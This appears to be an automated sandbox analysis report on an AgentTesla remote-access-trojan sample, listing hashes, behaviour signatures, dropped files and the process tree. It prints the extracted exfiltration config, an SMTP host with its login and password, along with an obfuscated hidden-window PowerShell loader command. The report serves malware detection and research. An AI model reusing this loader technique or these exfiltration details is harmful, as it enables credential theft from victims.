Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
142s -
max time network
151s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
02/08/2024, 02:10
Static task
static1
Behavioral task
behavioral1
Sample
a040ff5358e881adf59b8446ebdbb987a486c4fe90e2f1d64a5b9abadd550fd9.exe
Resource
win7-20240704-en
General
-
Target
a040ff5358e881adf59b8446ebdbb987a486c4fe90e2f1d64a5b9abadd550fd9.exe
-
Size
593KB
-
MD5
ca61c16bb94540662facaa6cf7f317f8
-
SHA1
6fd5af916972136da2bcefb6188d1c11c905ed41
-
SHA256
a040ff5358e881adf59b8446ebdbb987a486c4fe90e2f1d64a5b9abadd550fd9
-
SHA512
a41ebbe793b3d234921656b6ef3df75e500bb115ce3788e1bb4bc57ebda2de0dcbcdea24b51b53d8343e3b60977d2a57c577aef03613694d2c0a7346bac6eb5f
-
SSDEEP
12288:1oGrkCEw+Is4l8O3d5Gu8y5pSqgsZsFKSB82MiEhB:1oGI3w1l8Ot5Gvy5DKEdB
Malware Config
Extracted
agenttesla
Protocol: smtp- Host:
mmppf.com - Port:
587 - Username:
[email protected] - Password:
Riy@Saudi#2030 - Email To:
[email protected]
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 576 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 5 drive.google.com 3 drive.google.com -
Drops file in System32 directory 5 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\Pentose.lnk a040ff5358e881adf59b8446ebdbb987a486c4fe90e2f1d64a5b9abadd550fd9.exe File opened for modification C:\Windows\SysWOW64\playgoers.sep a040ff5358e881adf59b8446ebdbb987a486c4fe90e2f1d64a5b9abadd550fd9.exe File created C:\Windows\SysWOW64\bores.lnk a040ff5358e881adf59b8446ebdbb987a486c4fe90e2f1d64a5b9abadd550fd9.exe File opened for modification C:\Windows\SysWOW64\bores.lnk a040ff5358e881adf59b8446ebdbb987a486c4fe90e2f1d64a5b9abadd550fd9.exe File created C:\Windows\SysWOW64\Pentose.lnk a040ff5358e881adf59b8446ebdbb987a486c4fe90e2f1d64a5b9abadd550fd9.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 2808 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 576 powershell.exe 2808 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 576 set thread context of 2808 576 powershell.exe 34 -
Drops file in Program Files directory 4 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Common Files\Vaginismus.ini a040ff5358e881adf59b8446ebdbb987a486c4fe90e2f1d64a5b9abadd550fd9.exe File opened for modification C:\Program Files (x86)\Common Files\nvningedomstol\arbejdskommando.sto a040ff5358e881adf59b8446ebdbb987a486c4fe90e2f1d64a5b9abadd550fd9.exe File opened for modification C:\Program Files (x86)\Common Files\Pygopagus172\matthfus.ala a040ff5358e881adf59b8446ebdbb987a486c4fe90e2f1d64a5b9abadd550fd9.exe File opened for modification C:\Program Files (x86)\Common Files\lnstigningsmnstre\Ccny.sta a040ff5358e881adf59b8446ebdbb987a486c4fe90e2f1d64a5b9abadd550fd9.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File opened for modification C:\Windows\resources\0409\ejerlst.uns a040ff5358e881adf59b8446ebdbb987a486c4fe90e2f1d64a5b9abadd550fd9.exe File opened for modification C:\Windows\resources\fysiurg\Cheesecutter.ini a040ff5358e881adf59b8446ebdbb987a486c4fe90e2f1d64a5b9abadd550fd9.exe File opened for modification C:\Windows\yer.ini a040ff5358e881adf59b8446ebdbb987a486c4fe90e2f1d64a5b9abadd550fd9.exe File opened for modification C:\Windows\truthlessly\Stablish.ini a040ff5358e881adf59b8446ebdbb987a486c4fe90e2f1d64a5b9abadd550fd9.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wab.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a040ff5358e881adf59b8446ebdbb987a486c4fe90e2f1d64a5b9abadd550fd9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 576 powershell.exe 576 powershell.exe 576 powershell.exe 576 powershell.exe 576 powershell.exe 576 powershell.exe 2808 wab.exe 2808 wab.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 576 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 576 powershell.exe Token: SeDebugPrivilege 2808 wab.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2808 wab.exe -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 2700 wrote to memory of 576 2700 a040ff5358e881adf59b8446ebdbb987a486c4fe90e2f1d64a5b9abadd550fd9.exe 30 PID 2700 wrote to memory of 576 2700 a040ff5358e881adf59b8446ebdbb987a486c4fe90e2f1d64a5b9abadd550fd9.exe 30 PID 2700 wrote to memory of 576 2700 a040ff5358e881adf59b8446ebdbb987a486c4fe90e2f1d64a5b9abadd550fd9.exe 30 PID 2700 wrote to memory of 576 2700 a040ff5358e881adf59b8446ebdbb987a486c4fe90e2f1d64a5b9abadd550fd9.exe 30 PID 576 wrote to memory of 1788 576 powershell.exe 32 PID 576 wrote to memory of 1788 576 powershell.exe 32 PID 576 wrote to memory of 1788 576 powershell.exe 32 PID 576 wrote to memory of 1788 576 powershell.exe 32 PID 576 wrote to memory of 2808 576 powershell.exe 34 PID 576 wrote to memory of 2808 576 powershell.exe 34 PID 576 wrote to memory of 2808 576 powershell.exe 34 PID 576 wrote to memory of 2808 576 powershell.exe 34 PID 576 wrote to memory of 2808 576 powershell.exe 34 PID 576 wrote to memory of 2808 576 powershell.exe 34
Processes
-
C:\Users\Admin\AppData\Local\Temp\a040ff5358e881adf59b8446ebdbb987a486c4fe90e2f1d64a5b9abadd550fd9.exe"C:\Users\Admin\AppData\Local\Temp\a040ff5358e881adf59b8446ebdbb987a486c4fe90e2f1d64a5b9abadd550fd9.exe"1⤵
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2700 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Undiaphanousness=Get-Content 'C:\Users\Admin\AppData\Local\Temp\fingerstningerne\flagellulae\Rouilles\Effektiviseret.Dia';$Trafikflyene=$Undiaphanousness.SubString(51750,3);.$Trafikflyene($Undiaphanousness)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:576 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/c set /A 1^^0"3⤵
- System Location Discovery: System Language Discovery
PID:1788
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"3⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2808
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
50KB
MD5fd91c54cfd0dc5ffb898c8c6f497eb88
SHA1c4ffcd13c0a7e9bf4811c19d969cdd6adae83926
SHA256d947ac7f9b2519129e2352c38fef03524c8ea3abfccc968cee8fad3539508cd1
SHA5127075cd28627540323a1212f677b4a8bff6945960e2ff71d6bcd4f4ea68db625b51017c9841fd1db06f156e327fcdc647391ae7d30af3a4fe60dd3be4083b0616
-
Filesize
318KB
MD533bcb10fedd219077c00de12d43139cd
SHA192090f81150635c2142d09cae191d01c7ff79e0a
SHA25667e412a4be377c5fa0e6d565b0774353e6588f6cd3bbd5774c3d51b0ee20a7a3
SHA51207a6c983e2973743fc6fb86a89d6b649d05436f4c4e6321218c6122eb99afcb9d41a6a53b27f4d2a962ea1b0d9363e0f6811013d7530d3099063f1630466e16a
-
Filesize
1KB
MD5364cf955961bb6ef65ef9a0c55cb2b6d
SHA1c9eaa40fa7c5a13f48625275c46fc56d1729dddd
SHA256d868d3e0442ede82e84788663391065460b2605fa71e4b03454bdc35cc7e2c26
SHA512678731a61614a6ebdfe192f3d87ad398458891afcf295361968862209c70d2486d9e3c3e979b2f4e2948bb51fa08dbe4152c5c681843936290bb74dc133bc02d
-
Filesize
38B
MD5e58f8a2dcf15a626bc785906a24d269a
SHA1451f8692070432dbd0232c61631cb49874323fd7
SHA25639b313e3f6e503de2657691e96235891834d12dab42957e62aea1c588c35bc83
SHA5127c33aec2758c72eb727f156ca5946626409a1b2ad22a980801436acacac1bf05eac231a2a0cc2858d369a54cbfa3cafdbd449ce696bf6c8fcecfb53699a75bd3